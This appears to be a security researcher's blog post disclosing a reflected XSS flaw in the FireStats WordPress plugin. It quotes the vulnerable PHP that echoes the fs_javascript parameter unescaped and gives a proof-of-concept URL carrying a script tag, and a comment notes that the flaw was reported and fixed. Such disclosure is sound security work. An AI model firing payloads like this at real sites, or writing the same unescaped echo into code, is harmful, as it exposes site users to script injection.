0day wordpress XSS in firestats plugin
I found a remotely exploitable reflected cross site scripting vulnerability in the wordpress firestats plugin.
There is a small if statement for the GET value fs_javascript in the file /wp-content/plugins/firestats-wordpress.php here:
[php]
if (isset($_GET['fs_javascript']))
{
add_action('init','fs_resume_js_call');
}
[/php]
This function will call to the function called "fs_resume_js_call" which is also in the file "/wp-content/plugins/firestats-wordpress.php":
[php]
function fs_resume_js_call()
{
$path = fs_get_firestats_path();
$file = $_GET['fs_javascript'];
unset($_GET['fs_javascript']);
// security check
if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript");
$allowed_files = array
(
'php/ajax-handler.php',
'php/window-donation.php',
'css/base.css.php',
'js/page-settings.js.php',
'php/page-settings.php',
'js/page-wordpress-settings.js.php',
'php/page-wordpress-settings.php',
'js/page-database.js.php',
'php/page-database.php',
'js/page-users.js.php',
'css/page-users.css.php',
'php/page-users.php',
'js/page-sites.js.php',
'css/page-sites.css.php',
'php/page-sites.php',
'php/page-tools.php',
'php/window-add-excluded-url.php',
'php/window-add-excluded-ip.php',
'php/window-delete-site.php',
'php/window-new-edit-site.php',
'php/window-edit-user.php',
'php/window-delete-user.php',
'php/tools/system_test.php',
'js/firestats.js.php'
);
$found = false;
foreach ($allowed_files as $a)
{
if ($file == $a)
{
$found = true;
break;
}
}
if (!$found) die("$file is not allowed");
require_once("$path/$file");
die();
}
[/php]
The problem is that if the file is not in the array of allowed files it will go to the die("$file is not allowed"); which will cause the page to not further load, the variable $file is user controlled because earlier in the script it will be equalized with $_GET['fs_javascript'] ($file = $_GET['fs_javascript']; line 4 in the function "fs_resume_js_call").
So injecting fs_javascript with malicious client side javascript not containing ".." (otherwise it will die too early) will trigger the XSS.
Here is the PoC:
[js]/wp-admin/index.php?fs_javascript=<script>alert(123)</script>[/js]
1 Comment
-
Jelmer de Hen says:
I notified firestats and they immediately fixed the issue:
http://firestats.cc/wiki/ChangeLog
# Fixed XSS vulnerability in the wordpress plugin (#1357)Upgrade to version 1.6.5-stable people
.
Hello, I am Jelmer, born in 1991, I have been playing in IT security for over half my age, I am not sure when how and why it started but I like it. I met Fredrik and Mathias through the internet. This is my Twitter account, feel free to follow me. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.